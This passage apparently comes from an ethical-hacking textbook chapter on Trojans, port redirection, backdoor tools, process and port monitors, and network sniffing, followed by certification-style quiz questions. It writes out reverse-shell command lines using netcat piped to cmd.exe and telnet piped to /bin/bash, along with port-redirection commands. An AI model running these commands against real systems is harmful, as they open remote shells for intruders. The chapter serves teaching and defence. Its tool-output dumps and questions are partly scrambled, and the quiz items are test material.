controls can be overridden by launching HTML files from a local disk or changing system Registry
entries.
VBScript and Java scripts. Rogue scripts can automatically send data to a web server without
the owners knowledge or use the computer for distributed denial-of-service attack.
Iframes. An iframe embedded in an email message can be used to run some VB script; this
script can access the local file system to read or delete files.
Images. Embedded images can be dangerous and cause the execution of unwanted code. Web
bugs can also create privacy issues.
Flash applets. There arent many incidents reported in the wild, but some bugs could be used to
execute arbitrary code.
Wrappers
Its getting harder and harder to infect a PC with a Trojan, as effective anti-malware software and
devices shorten the time between a zero-day outbreak and the remedy. One common and effective
way for an attacker to get their Trojan installed on the victims computer is by using a wrapper.
A wrapper is a program used to combine two or more executables into a single packaged program.
The wrapper attaches a harmless executable, like a game, to a Trojans payload, the executable code
that does the real damage, so that it appears to be a harmless file.
When the user runs the wrapped executable, it first runs the game or animation and then installs the
wrapped Trojan in the background, although the user sees only the animation. For example, a
common wrapped Trojan sends an animated birthday greeting that installs BO2K while the user
watches a dancing birthday cake. Figure 8-1 shows the wrapper concept.
Covert Communication
In the world of hacking, covert communication can be accomplished by using a covert channel. A
covert channel is a way of transmitting data by using a path differently from its original intention. Well
examine the concept of covert channels before showing you how these channels are used in hacking.
The Orange Book defines two types of assurance: operational assurance and lifecycle assurance.
Operational assurance focuses on the basic features and architecture of a system, while lifecycle
assurance focuses on the controls and standards that are necessary for building and maintaining a
system. An example of an operational assurance is a feature that separates a security-sensitive code
from a user code in a systems memory.
The operational assurance requirements specified in the Orange Book are as follows:
System architecture
System integrity
Covert channel analysis
Trusted facility management
Trusted recovery
TCSEC defines covert channels. An information transfer path within a system is a generic definition of
a channel. A channel may also refer to the mechanism by which the path is affected. A covert channel
is a communication channel that allows a process to transfer information in a manner that violates the
systems security policy. A covert channel is an information path that is not normally used for
communication within a system; therefore, it is not protected by the systems normal security
mechanisms. Covert channels are a secret way to convey information to another person or program.
There are two common types of covert channels: covert storage channels and covert timing channels.
Port Redirection
For a packet to reach its destination, it must have an IP address and a port number. Port numbers
range from 0 to 65535. Most applications use well-known ports. For example, DNS uses port 53,
whereas HTTP uses 80.
Therefore, hackers often must use port redirection to get their packets onto the target network.
Redirection works by listening to a certain configured port and redirecting all packets to a secondary
destination. This redirection usually occurs from the attackers system to a defaced key system with
access to the target network and then to the target network.
Some of the tools used for port redirection include reverse Telnet, datapipe, fpipe, rinetd, and netcat.
Most of these tools are protocol ignorant. They dont care what protocol is passed; they just act as the
conduit to move data from port to port through the network.
NetCat
Netcat is a port direction tool that can be used with both Unix and Windows. Its very versatile and can
be used in combination with other redirectors listed in a moment. It can use either TCP or UDP and
can redirect inbound or outbound traffic from any port. In addition, it has built-in port-scanning
capabilities, a port randomizer, and source-routing capability.
For example, if the machine on 10.10.1.1 has a listening netcat service on TCP 80 and TCP 25 and is
configured correctly for TCP 80 to be inbound and TCP 25 to be outbound between the compromised
system, the command to shell remote commands is:
C:\> nc 10.10.1.1 80 | cmd.exe | nc 10.10.1.1 25
Reverse Telnet
A common redirection technique, reverse Telnet, is very fast and simple because uploading files is not
usually necessary. It is called reverse Telnet because it uses Telnet to connect to listening NetCat
windows and then feeds the commands from one window into the reverse Telnet stream, sending
output into the other window.
Reverse Telnet is executed by starting two NetCat shells on a machine:
C:\> nc -vv -l -p 80
E:\> nc -vv -l -p 25
The attacker will use a Unix command on the target system to take input from port 25 and pipe it to
the local shell to execute the command and will then pipe the output back to the attackers port 80
shell:
[root@localhost]# sleep 10000 | telnet 10.10.1.1 80 | /bin/bash | telnet
10.10.1.1 25
Datapipe
A popular Unix redirection tool is Datapipe
(http://packetstormsecurity.nl/Exploit_Code_Archive/datapipe.c). Datapipe must be run on both ends
of the attack: the attackers originating computer and the compromised target behind a firewall.
The syntax to use it is:
datapipe <localport> <remoteport> <remotehost>
For example, to listen to port 65000 and forward the traffic to port 139 on a compromised WinNT
system at address 10.10.1.12, type:
datapipe 65000 139 10.10.1.12
Then the hacker would enter on his or her system:
datapipe 139 65000 10.10.1.9
The first command instructs the compromised system to redirect port 139 traffic to port 65000 (which
you should already have determined is not being blocked at the firewall). The second command takes
the hackers traffic on port 65000 and moves it to port 139, which allows the hacker to set up a null
session with the target.
Fpipe
Fpipe is a TCP source port forwarder and redirector developed by Foundstone. It can create a TCP
stream with a source port of your choice. It works like Datapipe but is designed for Windows systems
rather than Unix.
An example of its command syntax is:
fpipe -l 69
-r 53 -u 10.2.2.2
This means:
fpipe -l <listen> 69 <on port 69> -r <redirect> 53 <to port 53> -u <use
UDP> 10.2.2.2 (destination IP address of redirection>
Rinetd
Also called the reverse inet daemon, rinetd (www.boutell.com/rinetd/index.html) redirects TCP
connections from one IP address and port to another. Rinetd will redirect only connections that require
one port, thus excluding FTP which requires both ports 20 and 21.
Rinetd uses a very easy syntax:
bindaddress bindport connectaddress connectport
For example, 10.10.1.17 23 10.1.1.3 23 redirects all connections to port 23 from the address
10.10.1.17, through rinetd, and then to port 23 on 10.1.1.3.
Rinetd can be run from a configuration file such as /etc/rinetd.conf on a Unix machine with the
command:
[root@localhost]# rinetd -c config_file
In this example, the -c switch is used to point rinetd to a configuration file location different from the
original.
Tini
Tini (http://ntsecurity.nu/toolbox/tini) is a very small Trojan backdoor program, only 3 KB in size, and
programmed in assembly language. It takes minimal bandwidth to get on victims computer and takes
small disk space.
Tini only listens on port 7777 and runs a command prompt when someone attaches to this port. The
port number is fixed and cannot be customized. This makes it easier for a victim system to detect by
scanning for port 7777. From a Tini client you can telnet to Tini server at port 7777.
QAZ
QAZ is a companion virus that can spread over the network. It also has a backdoor that will enable a
remote user, using port 7597, to connect to and control the computer. QAZ renames the notepad
program to note.com and modifies the Registry key:
HKLM\software\Microsoft\Windows\CurrentVersion\Run.
Donald Dick
Donald Dick is another remote access tool that enables a user to control another computer over a
network. It uses a client-server architecture with the server residing on the victims computer. The
attacker uses the client to send a command through TCP or SPX to the victim at a predefined port.
Donald Dick uses default ports of either 23476 or 23477.
NetBus
NetBus is a Windows remote access tool created in 1998 and used as a backdoor. Translated from
Swedish, the name means NetPrank; it was in wide circulation before Back Orifice was released.
There are two components to the NetBuss client-server architecture. The server piece is a 500 KB
EXE file with various names like Patch.exe and SysEdit.exe.
When installed and run for the first time on the target computer, the server code modifies the Windows
Registry so that it starts automatically on each system startup and listens for connections on port
12345 or 12346.
The client code is a GUI that lets the attacker execute tasks on the remote target server, such as
running keyloggers, launching programs, shutting the system down, and other tasks.
Encryption. This encrypts the data sent between the BO2K GUI and the server.
BOSOCK32. This provides stealth capabilities by using ICMP instead of TCP UDP.
STCPIO. This provides encrypted flow control between the GUI and the server, making the traffic
more difficult to detect on the network.
Soon after BO appeared, a category of cleaners emerged, claiming to be able to detect and remove
BO. BOSniffer turned out to be one such Trojan that in reality installed Back Orifice under the pretext
of detecting and removing it. It announces itself on an IRC channel #BO_OWNED with a random
username.
SubSeven
Another Trojan that has lasted a long time is SubSeven, although its becoming less and less of a
problem. SubSeven is a backdoor program that enables others to gain full access to Windows
systems through the network. The program consists of three different components: client
(SubSeven.exe), server (Server.exe), and a server configuration utility (EditServer.exe). The
client is a GUI used to connect to a server through a network or internet connection.
Other Notables
Following is a list of still more Trojans.
Whack-A-Mole. A popular delivery vehicle for NetBus or BO servers is a game called Whack-AMole, which is a single executable called whackamole.exe. Whack-A-Mole installs a NetBus or
BO server and starts the program at every reboot.
Senna Spy. Senna Spy Generator 2.0 (http://sennaspy.cjb.net) is a Trojan code generator. Its
able to create a Visual Basic source code for a Trojan based on a few options. This Trojan is
compiled from generated source code.
Hard Disk Killer (HDKP4.0). The Hard Drive Killer Pro series of programs can fully and
permanently destroy all data on any given DOS or Windows hard drive. The program, once
executed, reboots the system within a few seconds and then unrecoverably reformats all hard
drives attached to the system within one to two seconds, regardless of the size of the hard drive.
FireKiller 2000. FireKiller 2000 will kill any virus protection software and is also intended to
disable a users personal firewall. For example, if you have Norton Anti-virus auto scan in your
taskbar and ATGuard Firewall activated, this program will kill both on execution, making the
installations of both unusable on the hard drive, requiring reinstallation of the software. It destroys
most protection software and software firewalls such as AtGuard, Conseal, Norton Anti-Virus, and
McAfee Anti-Virus.
Beast. Beast is a powerful Trojan RAT. One of the features of Beast is that it is an all-in-one
Trojan; that is, the client, server, and server editor programs are bundled into one application.
Tripwire
The protection system Tripwire (www.tripwire.com) has been around for quite a while. It automatically
calculates cryptographic hashes of all key system files or any file that you want to monitor for
modifications. Tripwire works by creating a baseline snapshot of the system. It will then periodically
scan those files and recalculate the information to see if any of the information has changed. It will
raise an alarm if changes are detected.
Fport
Fport, by Foundstone (www.foundstone.com), identifies unknown open ports and their associated
applications. Fport reports all open TCP/IP and UDP ports and maps them to the owning application.
This is the same information you would see using the netstat -an command, but it also maps
those ports to running processes with the PID, process name, and path. Fport can be used to identify
quickly unknown open ports and their associated applications.
TCPView
TCPView is a Windows program that will show you detailed listings of all TCP and UDP endpoints on
your system, including the local and remote addresses and state of TCP connections. On Windows
NT, 2000, and XP, TCPView also reports the name of the process that owns the endpoint. TCPView
provides a more informative and conveniently presented subset of the Netstat program that ships with
Windows. The TCPView download includes Tcpvcon, a command-line version with the same
functionality.
TCPView works on Windows NT/2000/XP and Windows 98/Me. You can use TCPView on Windows
95 if you get the Windows 95 Winsock 2 Update from Microsoft.
It has an easy-to-use interface and can output to a text file, such as:
[System Process]:0
TCP
127.0.0.1:1025
TCP
127.0.0.1:1025
127.0.0.1:3862
TIME_WAIT
[System Process]:0
127.0.0.1:3860
TIME_WAIT
[System Process]:0
TCP
127.0.0.1:3829
127.0.0.1:1025
TCP
127.0.0.1:3833
127.0.0.1:1025
TIME_WAIT
[System Process]:0
TIME_WAIT
[System Process]:0
TCP
127.0.0.1:3849
127.0.0.1:1025
TCP
192.168.0.100:3830
TCP
192.168.0.100:3834
TIME_WAIT
[System Process]:0
66.102.1.147:80
TIME_WAIT
[System Process]:0
216.239.37.104:80
TIME_WAIT
[System Process]:0
TCP
192.168.0.100:3850
TCP
192.168.0.100:3890
72.14.253.91:80
TIME_WAIT
[System Process]:0
63.88.212.184:80
alg.exe:2460
TIME_WAIT
TCP
127.0.0.1:1031
BTStackServer.exe:3624
CCAPP.EXE:2880
UDP
TCP
0.0.0.0:0
0.0.0.0:1039
LISTENING
127.0.0.1:1032
*:*
0.0.0.0:0
LISTENING
CCPROXY.EXE:1360
TCP
127.0.0.1:1025
0.0.0.0:0
TCP
127.0.0.1:1025
127.0.0.1:3869
TCP
127.0.0.1:1025
127.0.0.1:3884
TCP
127.0.0.1:1025
127.0.0.1:3870
TCP
127.0.0.1:1025
127.0.0.1:3864
TCP
127.0.0.1:1025
127.0.0.1:3831
TCP
127.0.0.1:1025
127.0.0.1:3866
TCP
127.0.0.1:1025
127.0.0.1:3891
TCP
127.0.0.1:1025
127.0.0.1:3871
TCP
192.168.0.100:3832
216.239.37.104:80
TCP
192.168.0.100:3865
72.246.19.8:80
TCP
192.168.0.100:3867
72.246.19.8:80
TCP
192.168.0.100:3873
72.246.19.8:80
TCP
192.168.0.100:3875
65.54.195.185:80
LISTENING
CCPROXY.EXE:1360
ESTABLISHED
CCPROXY.EXE:1360
ESTABLISHED
CCPROXY.EXE:1360
ESTABLISHED
CCPROXY.EXE:1360
ESTABLISHED
CCPROXY.EXE:1360
ESTABLISHED
CCPROXY.EXE:1360
ESTABLISHED
CCPROXY.EXE:1360
ESTABLISHED
CCPROXY.EXE:1360
ESTABLISHED
CCPROXY.EXE:1360
ESTABLISHED
CCPROXY.EXE:1360
ESTABLISHED
CCPROXY.EXE:1360
ESTABLISHED
CCPROXY.EXE:1360
ESTABLISHED
CCPROXY.EXE:1360
ESTABLISHED
CCPROXY.EXE:1360
TCP
192.168.0.100:3877
72.246.19.8:80
TCP
192.168.0.100:3885
72.246.19.18:80
TCP
192.168.0.100:3892
66.193.254.53:80
TCP
127.0.0.1:3823
127.0.0.1:3824
TCP
127.0.0.1:3824
127.0.0.1:3823
TCP
127.0.0.1:3825
127.0.0.1:3826
TCP
127.0.0.1:3826
127.0.0.1:3825
TCP
127.0.0.1:3831
127.0.0.1:1025
TCP
127.0.0.1:3864
127.0.0.1:1025
TCP
127.0.0.1:3866
127.0.0.1:1025
TCP
127.0.0.1:3869
127.0.0.1:1025
TCP
127.0.0.1:3870
127.0.0.1:1025
TCP
127.0.0.1:3871
127.0.0.1:1025
TCP
127.0.0.1:3884
127.0.0.1:1025
TCP
127.0.0.1:3891
127.0.0.1:1025
ESTABLISHED
CCPROXY.EXE:1360
ESTABLISHED
CCPROXY.EXE:1360
ESTABLISHED
firefox.exe:1476
ESTABLISHED
firefox.exe:1476
ESTABLISHED
firefox.exe:1476
ESTABLISHED
firefox.exe:1476
ESTABLISHED
firefox.exe:1476
ESTABLISHED
firefox.exe:1476
ESTABLISHED
firefox.exe:1476
ESTABLISHED
firefox.exe:1476
ESTABLISHED
firefox.exe:1476
ESTABLISHED
firefox.exe:1476
ESTABLISHED
firefox.exe:1476
ESTABLISHED
firefox.exe:1476
ESTABLISHED
IEXPLORE.EXE:3384
UDP
127.0.0.1:1449
lsass.exe:716
UDP
0.0.0.0:500
lsass.exe:716
UDP
0.0.0.0:4500
*:*
*:*
*:*
mcrdsvc.exe:2084
UDP
0.0.0.0:3776
*:*
svchost.exe:1052
UDP
0.0.0.0:1203
*:*
svchost.exe:1052
UDP
0.0.0.0:1027
*:*
svchost.exe:1052
UDP
0.0.0.0:1202
*:*
svchost.exe:1052
UDP
0.0.0.0:1206
*:*
svchost.exe:1052
UDP
0.0.0.0:1201
*:*
svchost.exe:1052
UDP
0.0.0.0:1059
*:*
svchost.exe:1052
UDP
0.0.0.0:1204
*:*
svchost.exe:1052
UDP
0.0.0.0:1200
*:*
svchost.exe:1844
TCP
0.0.0.0:2869
0.0.0.0:0
LISTENING
svchost.exe:1844
TCP
192.168.0.100:2869
svchost.exe:1844
UDP
127.0.0.1:1900
svchost.exe:1844
UDP
192.168.0.100:1900
192.168.0.1:1033
CLOSE_WAIT
*:*
svchost.exe:940
TCP
0.0.0.0:135
svchost.exe:980
UDP
127.0.0.1:123
svchost.exe:980
UDP
127.0.0.1:1037
svchost.exe:980
UDP
192.168.0.100:123
*:*
0.0.0.0:0
LISTENING
*:*
*:*
System:4
TCP
0.0.0.0:445
System:4
TCP
192.168.0.100:139
System:4
UDP
0.0.0.0:445
System:4
UDP
192.168.0.100:138
*:*
System:4
UDP
192.168.0.100:137
*:*
*:*
0.0.0.0:0
0.0.0.0:0
LISTENING
LISTENING
*:*
Tcpvcon is the command-line version of TCPView. Its usage is similar to that of the built-in Windows
netstat utility. Just typing tcpvcon in a CMD box will output:
[TCP] C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
PID:
1360
State:
ESTABLISHED
Local:
D5NV1CC1:1025
Remote:
D5NV1CC1:3831
1360
State:
ESTABLISHED
Local:
D5NV1CC1:1025
Remote:
D5NV1CC1:3864
1360
State:
ESTABLISHED
Local:
D5NV1CC1:1025
Remote:
D5NV1CC1:3866
1360
State:
ESTABLISHED
Local:
D5NV1CC1:1025
Remote:
D5NV1CC1:3869
1360
State:
ESTABLISHED
Local:
D5NV1CC1:1025
Remote:
D5NV1CC1:3870
1360
State:
ESTABLISHED
Local:
D5NV1CC1:1025
Remote:
D5NV1CC1:3871
1360
State:
ESTABLISHED
Local:
D5NV1CC1:1025
Remote:
D5NV1CC1:3884
1476
State:
ESTABLISHED
Local:
D5NV1CC1:3823
Remote:
D5NV1CC1:3824
1476
State:
ESTABLISHED
Local:
D5NV1CC1:3824
Remote:
D5NV1CC1:3823
1476
State:
ESTABLISHED
Local:
D5NV1CC1:3825
Remote:
D5NV1CC1:3826
1476
State:
ESTABLISHED
Local:
D5NV1CC1:3826
Remote:
D5NV1CC1:3825
1476
State:
ESTABLISHED
Local:
D5NV1CC1:3831
Remote:
D5NV1CC1:1025
1476
State:
ESTABLISHED
Local:
D5NV1CC1:3864
Remote:
D5NV1CC1:1025
1476
State:
ESTABLISHED
Local:
D5NV1CC1:3866
Remote:
D5NV1CC1:1025
1476
State:
ESTABLISHED
Local:
D5NV1CC1:3869
Remote:
D5NV1CC1:1025
1476
State:
ESTABLISHED
Local:
D5NV1CC1:3870
Remote:
D5NV1CC1:1025
1476
State:
ESTABLISHED
Local:
D5NV1CC1:3871
Remote:
D5NV1CC1:1025
1476
State:
ESTABLISHED
Local:
D5NV1CC1:3884
Remote:
D5NV1CC1:1025
1360
State:
ESTABLISHED
Local:
d5nv1cc1:3832
Remote:
va-in-f104.google.com:http
1360
State:
ESTABLISHED
Local:
d5nv1cc1:3865
Remote:
a72-246-19-8.deploy.akamaitechnologies.com:http
1360
State:
ESTABLISHED
Local:
d5nv1cc1:3867
Remote:
a72-246-19-8.deploy.akamaitechnologies.com:http
1360
State:
ESTABLISHED
Local:
d5nv1cc1:3873
Remote:
a72-246-19-8.deploy.akamaitechnologies.com:http
1360
State:
ESTABLISHED
Local:
d5nv1cc1:3875
Remote:
65.54.195.185:http
1360
State:
ESTABLISHED
Local:
d5nv1cc1:3877
Remote:
a72-246-19-8.deploy.akamaitechnologies.com:http
1360
State:
ESTABLISHED
Local:
d5nv1cc1:3885
Remote:
a72-246-19-18.deploy.akamaitechnologies.com:http
Process Viewer
Process Viewer (PrcView) (www.teamcti.com/pview/prcview.htm) is a free GUI-based process viewer
utility that displays detailed information about processes running under Windows. For each process it
displays memory, threads, and module usage. For each DLL, it shows full path and version
information. PrcView comes with a command-line version that allows you to write scripts to check
whether a process is running and stop it, if necessary.
PrcView provides an extensive alphabetical list of processes that can be saved in a text format:
alg.exe
2460
C:\WINDOWS\System32\alg.exe
Service 5.1.2600.2180.
ALUSchedulerSvc.exe
C:\Program
Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
Scheduler Service 3.0.0.171.
BTStackServer.exe
3624
Software\BTStackServer.exe
Automatic LiveUpdate
C:\Program Files\Widcomm\Bluetooth
Bluetooth Stack COM Server 1.2.2.15.
3332
C:\Program Files\Widcomm\Bluetooth
Software\BTTray.exe
Copyright
2880
Shared\ccApp.exe
Copyright (c)
1272
Shared\ccEvtMgr.exe
1360
Shared\ccProxy.exe
1228
Shared\ccSetMgr.exe
636
C:\WINDOWS\system32\csrss.exe
Process 5.1.2600.2180.
CTDVDDet.EXE
2992
Files\Creative\SBAudigy2\DVDAudio\CTDVDDet.EXE
CTDVDDET 1.0.2.0.
3176
5.1.2600.2180.
C:\WINDOWS\system32\ctfmon.exe
CTF Loader
CTSvcCDA.EXE
328
C:\WINDOWS\system32\CTSvcCDA.EXE
Creative Service
2960
C:\Program Files\Creative\SBAudigy2\Surround
Mixer\CTSysVol.exe
CTSysVol.exe 1.0.0.0.
3116
5\DirectCD\DirectCD.exe
Copyright (c)
3340
Line Detection 1, 0, 0, 1.
dllhost.exe
2304
5.1.2600.2180.
COM Surrogate
C:\Program Files\Dell\Media
Experience\DMXLauncher.exe
3164
DMXLauncher.exe
Support 2, 1, 3, 176.
ehmsas.exe
Copyright 2003
C:\WINDOWS\system32\dllhost.exe
DMXLauncher.exe
DSAgnt.exe
Digital
2868
Dell
C:\WINDOWS\eHome\ehmsas.exe
rights reserved.
ehRecvr.exe
432
C:\WINDOWS\eHome\ehRecvr.exe
Service 5.1.2715.3011.
ehSched.exe
448
C:\WINDOWS\eHome\ehSched.exe
Media Center
reserved.
ehtray.exe
2780
C:\WINDOWS\ehome\ehtray.exe
Applet 5.1.2715.2765.
Explorer.EXE
2716
6.00.2900.2180.
firefox.exe
Windows Explorer
1476
Firefox 2.0.0.3.
hpztsb04.exe
3104
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe
2,75,0,0.
2816
Manager\Iaanotif.exe
Iaantmon.exe
516
Manager\Iaantmon.exe
Copyright(C) Intel
Corporation 2003-06
IEXPLORE.EXE
3384
reserved.
iPodService.exe
3660
C:\Program Files\iPod\bin\iPodService.exe
Rights Reserved.
issch.exe
2932
C:\Program Files\Common
Files\InstallShield\UpdateService\issch.exe
Service Scheduler 3, 10.
InstallShield Update
Corporation
iTunesHelper.exe
3128
C:\Program Files\iTunes\iTunesHelper.exe
Rights Reserved.
lsass.exe
716
C:\WINDOWS\system32\lsass.exe
Version) 5.1.2600.2180.
mcrdsvc.exe
2084
C:\WINDOWS\ehome\mcrdsvc.exe
4.1.2710.2732.
MDM.EXE
420
Shared\VS7DEBUG\MDM.EXE
Corporation.
msmsgs.exe
C:\Program Files\Messenger\msmsgs.exe
1940
612
Windows
C:\WINDOWS\system32\MsPMSPSv.exe
Service 7.00.00.1954.
navapsvc.exe
Microsoft
WMDM PMSP
AntiVirus\navapsvc.exe
2596
Shared\Security Console\NSCSRVCE.EXE
Protection Center Service 2006.1.8.
1240
C:\WINDOWS\system32\nvsvc32.exe
NVIDIA Driver
rights reserved.
PrcView.exe
2760
Vines\Desktop\drivers\PrcView.exe
2944
C:\Program Files\QuickTime\qttask.exe
QuickTime
704
Services and
reserved.
smss.exe
588
C:\WINDOWS\System32\smss.exe
Manager 5.1.2600.2180.
SNDSrvc.exe
1372
Windows NT Session
Shared\SNDSrvc.exe
Symantec Corporation
SPBBCSvc.exe
1416
Shared\SPBBC\SPBBCSvc.exe
1676
App 5.1.2600.2696.
stsystra.exe
2808
C:\WINDOWS\system32\spoolsv.exe
Spooler SubSystem
nd444 cp1.
SigmaTel, Inc.
svchost.exe
896
C:\WINDOWS\system32\svchost.exe
Generic Host
rights reserved.
svchost.exe
940
C:\WINDOWS\system32\svchost.exe
Generic Host
rights reserved.
svchost.exe
980
C:\WINDOWS\System32\svchost.exe
Generic Host
rights reserved.
svchost.exe
1052
C:\WINDOWS\system32\svchost.exe
Generic Host
rights reserved.
svchost.exe
1080
C:\WINDOWS\system32\svchost.exe
Generic Host
rights reserved.
svchost.exe
1844
C:\WINDOWS\system32\svchost.exe
Generic Host
rights reserved.
svchost.exe
2092
C:\WINDOWS\System32\svchost.exe
Generic Host
rights reserved.
svchost.exe
3032
C:\WINDOWS\system32\svchost.exe
Generic Host
rights reserved.
symlcsvc.exe
1460
Shared\CCPD-LC\symlcsvc.exe
660
C:\WINDOWS\system32\winlogon.exe
Application 5.1.2600.2180.
Windows NT Logon
reserved.
WINWORD.EXE
3488
C:\Program Files\Microsoft
Office\Office\WINWORD.EXE
Inzider
Inzider (http://ntsecurity.nu/toolbox/inzider/) is another utility that tracks processes and ports. Like
Process Viewer, it lists processes in your Windows system and the ports to which each one is
listening. For instance, under Windows NT/2K, BO2K injects itself into other processes, so it is not
visible in the Task Manager as a separate process. When you run Inzider, you will see the port BO2K
has bound in its host process. Unfortunately, Inzider has stability issues with Windows, causing it to
crash. In rare cases, it may damage the system.
Sniffers
Sniffing is the process of gathering traffic from a network by capturing the data as they pass and
storing them to analyze later. A protocol analyzer can be used to capture data packets that are later
decoded to collect information such as passwords or infrastructure configurations.
A sniffer is a piece of software that captures the traffic flowing into and out of a computer attached to a
network. Simply put, sniffers monitor network data. A sniffer can be a self-contained software program
or a hardware device with the appropriate software or firmware programming. Sniffers usually act as
network probes or snoops. They examine network traffic but do not intercept or alter it.
Some sniffers work only with TCP/IP packets, but the more sophisticated tools can work with many
other protocols and at lower levels such as the Ethernet frame.
A sniffer attack is commonly used to grab logins and passwords that are traveling around on the
network. Users of computer networks unwittingly disclose sensitive information about themselves
through the use of insecure software and protocols. Standard implementations of widely adopted
protocols such as Windows file sharing (CIFS/SMB), Telnet, POP3, HTTP, and FTP transmit login
passwords in clear text, exposing an extremely large segment of the internet population to sniffingrelated attacks.
Popular attack methods that utilize sniffing include man-in-the-middle attacks and session hijacking
exploits, using MAC flooding and ARP spoofing.
Sniffing Exploits
Sniffing can be active or passive. Passive sniffing is performed on a network hub and merely involves
examining the packets that travel through a hub. Hubs operate at the Physical Layer of the OSI
model. Hubs are used to connect multiple LAN devices, such as servers and workstations. They do
not add much intelligence to the communications process, however, as they dont filter packets,
examine addressing, or alter the data packet. Figure 8-3 shows a repeater or hub amplifying the
network signal.
ARP Spoofing
To understand the technique of ARP spoofing (also called ARP poisoning), lets first look at the
Address Resolution Protocol (ARP) process.
IP needs to know the hardware address of the packets destination so it can send it. ARP is used to
match an IP address to a Media Access Control (MAC) address. ARP allows the 32-bit IP address to
be matched up with this hardware address.
A MAC address is a 6-byte, 12-digit hexadecimal number subdivided into two parts. The first three
bytes (or first half) of the MAC address is the manufacturers identifier (see Table 8-2). This can be a
good troubleshooting aid if a network device is acting up, as it will isolate the brand of the failing
device. The second half of the MAC address is the serial number the manufacturer has assigned to
the device.
Table 8-2: Common Vendor MAC Addresses
Open table as spreadsheet
FIRST THREE BYTES
MANUFACTURER
00000C
Cisco
0000A2
Bay Networks
0080D3
Shiva
00AA00
Intel
02608C
3COM
080007
Apple
080009
Hewlett-Packard
080020
Sun
08005A
IBM
ARP interrogates the network by sending out a broadcast seeking a network node that has a specific
IP address and then asking it to reply with its hardware address. ARP maintains a dynamic table
(known as the ARP cache) of these translations between IP addresses and MAC addresses so that it
has to broadcast a request to every host only the first time it is needed. Figure 8-5 shows a flow chart
of the ARP decision process.
2. The attacker sends a fake ARP response to remap the default routers IP to the attackers
MAC.
3. The victim sends traffic destined for the outside world based on a poisoned ARP table entry.
4. The victims redirected packets are forwarded through the switch to the attackers PC.
5. The attacker sniffs the traffic from the link and saves it for later examination.
6. The packets are forwarded from the attackers machine to the actual default router for delivery
to the outside world.
MAC Flooding
MAC flooding is another technique that allows an attacker to sniff a switched network. MAC flooding is
the act of attempting to overload the switchs Content Addressable Memory (CAM) table.
Some switches have a limited area where they store the CAM, which is a lookup table that enables
the switch to know through which what port to send each specific packet. If the CAM table fills up and
the switch can hold no more entries, they often fail open, which means that all frames start flooding
out of all ports of the switch, allowing the attacker to sniff much more traffic.
Two issues arise with the execution of MAC flooding: It may draw attention to the attacker, due to the
quantity of data being injected into the network. The sniffer must operate on a different network
segment than the injection, since the quantity of data could prevent the capture from working properly.
Sniffing Tools
A host of sniffing tools are out there, some free and some costly, and all useful for passive and active
sniffing, ARP spoofing, MAC flooding, and DNS poisoning.
Snort
Snort (www.snort.org) is a freeware lightweight IDS and general-purpose sniffer for various versions
of Linux, Unix, and Windows. There are three main modes in which Snort can be configured: sniffer,
packet logger, and network intrusion detection system.
The sniffer mode simply reads the packets off of the network and displays them for you in a
continuous stream on the console. Packet logger mode logs the packets to the disk. Network intrusion
detection mode is the most complex and customizable configuration, allowing Snort to analyze
network traffic for matches against a user defined rule set.
Dsniff
Dsniff (www.monkey.org/~dugsong/dsniff/) is a collection of tools for network auditing and penetration
testing. Dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for
interesting data (passwords, email, files, and so on). Arpspoof, dnsspoof, and macof facilitate the
interception of network traffic normally unavailable to an attacker (for instance, due to Layer-2
switching). Sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected
SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKIs. Monkey-in-the-middle attacks
are similar to man-in-the-middle attacks. They differ, however, in that the attacker controls both sides
of the conversation, posing both as the sender to the receiver and the receiver to the sender.
Ethereal
Ethereal (www.ethereal.com) is a free network protocol analyzer for Unix and Windows. It allows
users to examine data from a live network or from a capture file on disk. It can interactively browse the
capture data, viewing summary and detail information for each packet. Ethereal has several powerful
features, including a rich display filter language and the ability to view the reconstructed stream of a
TCP session and parse an 802.11 packet.
Cain (www.oxid.it/cain.html). This is a multipurpose tool that can perform ARP spoofing. It
allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted
passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations,
decoding scrambled passwords, recovering wireless network keys, revealing password boxes,
uncovering cached passwords, and analyzing routing protocols.
Sniffit (http://reptile.rug.ac.be/~coder/sniffit/sniffit.html or
www.symbolic.it/Prodotti/sniffit.html). This is a freeware general-purpose sniffer for various
versions of Linux, Unix, and Windows.
WinDump (http://netgroup-serv.polito.it/windump). Another freeware Windows generalpurpose sniffer, WinDump is based on TCPDump.
Mailsnarf. This is capable of capturing and outputting SMTP mail traffic that is sniffed on the
network.
Webspy. This allows the user to see all the WebPages visited by the victim.
Assessment Questions
Answers to these questions may be found in Appendix A.
1.
2.
3.
4.
5.
6.
7.
8.
c. A way of transmitting data by using a path differently from its original intention
d. A program that poisons the ARP cache
9.
d. ARP poisoning
18. What is Ethereal?
a. It redirects port 139 to port 65000 on the target machine.
b. It poisons the ARP cache.
c. It floods a switched network with Ethernet frames with random hardware
addresses.
d. It is free network protocol analyzer for Unix and Windows.
19. Which choice is not a definition of a Trojan horse?
a. A program that redirects port traffic
b. An unauthorized program contained within a legitimate program
c. Any program that appears to perform a desirable and necessary function but that,
because of hidden and unauthorized code, performs functions unknown and
unwanted by the user
d. A legitimate program that has been altered by the placement of unauthorized code
within it
20. Which Trojan uses port 31337?
a. NetBus
b. Donald Dick
c. Back Orifice
d. Beast
21. Which tool can be used for port redirection?
a. Loki
b. Datapipe
c. Tini
d. Donald Dick
22. Which statement about Fpipe is correct?
a. Datapipe-type utility for Windows
b. Datapipe-type utility for UNIX
c. UDP source port forwarder and redirector
d. ICMP tunnel
23. Which is the best description of a sniffer?
a. A legitimate program that has been altered by the placement of unauthorized code
within it
b. A program used to combine two or more executables into a single packaged
program
c. A piece of software that captures the traffic flowing into and out of a computer
attached to a network
d. A method of conveying information by changing a systems stored data
24. Which statement is the best description of ARP spoofing?
a. A program that redirects port traffic
b. A piece of software that captures the traffic flowing into and out of a computer
attached to a network
c. The act of attempting to overload the switchs CAM table
d. An attacker who poisons the ARP cache on a network device to reroute the victims
packets to his or her machine
25. What does the EtherFlood tool do?
a. Its a freeware Unix sniffer.
b. It poisons the ARP cache.
c. It floods a switched network with Ethernet frames containing random hardware
addresses.
